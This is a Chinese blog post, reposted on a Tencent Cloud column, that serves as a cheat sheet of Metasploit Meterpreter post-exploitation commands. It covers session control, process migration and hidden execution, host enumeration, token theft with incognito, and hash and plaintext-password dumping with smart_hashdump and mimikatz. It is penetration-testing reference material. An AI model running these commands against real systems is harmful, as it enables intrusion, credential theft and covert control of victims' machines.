前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MSF后渗透利用整理|MSF命令大全一

MSF后渗透利用整理|MSF命令大全一

作者头像
洛米唯熊
发布2019-07-25 14:59:04
6.7K0
发布2019-07-25 14:59:04
举报
文章被收录于专栏:洛米唯熊洛米唯熊

后渗透脚本知识

权限维持、权限提升、内网渗透等

内网渗透:信息搜集、读取用户hash、浏览器密码

域渗透:获取域控的控制权

Meterpreter基本概念

Meterpreter是Metasploit框架中的一个扩展模块,在攻击成 功以后给我们返回一个控制通道,是metsploit后渗透必不可少的 ,它具有强大的功能,包括socks代理,端口转发,键盘监听等多 个功能,meterpreter可以说是内网渗透测试神器。

基本功能

(1)系统信息获取

(2)密码哈希导出

(3)文件上传下载

(4)屏幕截取

(5)键盘记录

(6)权限提升

(7)跳板攻击

(8)反追踪

优点: 纯内存工作模式,执行漏洞渗透攻击的时候会直接装载meterpreter的 动态链接库到目标进程的空间中,使得meterpreter启动隐蔽,很难被杀毒软 件检测到;

一、后渗透基本操作

1.基本命令

background # 让meterpreter处于后台模式

sessions -i index # 与会话进行交互,index表示第一个session

quit # 退出会话

shell # 获得控制台权限

irb # 开启ruby终端

2.文件操作命令

cat # 查看文件内容

getwd # 查看当前工作目录

upload # 上传文件到目标机上

download # 下载文件到本机上

edit # 编辑文件

search # 搜索文件

3.网络命令

ipconfig / ifconfig # 查看网络接口信息

Portfwd # 端口转发 本机监听端口 把目标机端口转到本机端口上

Rdesktop # 使用rdesktop来连接 -u 用户名 -p 密码

Route # 获取路由表信息

二、后渗透基本操作

1.系统命令

ps # 查看当前活跃进程

migrate pid # 将Meterpreter会话移植到进程数位pid的进程中

execute -H -i -f cmd.exe # 创建新进程cmd.exe,-H不可见,-i交互

getpid # 获取当前进程的pid

kill pid # 杀死进程

getuid # 查看权限

sysinfo # 查看目标机系统信息,如机器名,操作系统等

shutdown # 关机

三、后渗透高级操作

1.Post模块

run post/windows/gather/enum_applications #获取安装软件信息

run post/windows/gather/dumplinks #获取最近的文件操作

run scraper #获取常见信息 #保存在~/.msf4/logs/scripts/scraper/目录下

run post/windows/gather/enum_patches #补丁信息

run post/windows/gather/enum_domain #查找域控

2.Load命令

load #加载模块

meterpreter > load mimikatz #加载mimikatz

meterpreter > load incognito #加载incoginto 盗窃目标主机的令牌或是假冒用户

3.信息搜集

用户是否在线

①查看是否为虚拟机

run post/windows/gather/checkvm

② quser :查看用户是否在线

③idletime :检查受害者闲置多久

④screenshot :截屏

4.用户口令

①hash

我们需要将administrator权限提升至system权限才能获取成功

meterpreter > run post/windows/gather/smart_hashdump

将域的密码也打出来

②mimikatz

meterpreter > load mimikatz #加载mimikatz

meterpreter > msv #获取hash值

meterpreter > Kerberos #获取明文

meterpreter > ssp #获取明文信息

meterpreter > wdigest #获取系统账户信息

meterpreter > mimikatz_command -f a:: #必须要以错误的模块来让正确的模块显示

meterpreter > mimikatz_command -f hash:: #获取目标 hash

meterpreter > mimikatz_command -f samdump::hashes

meterpreter > mimikatz_command -f sekurlsa::searchPasswords

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 后渗透脚本知识
  • Meterpreter基本概念
  • 基本功能
  • 一、后渗透基本操作
  • 二、后渗透基本操作
  • 三、后渗透高级操作
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档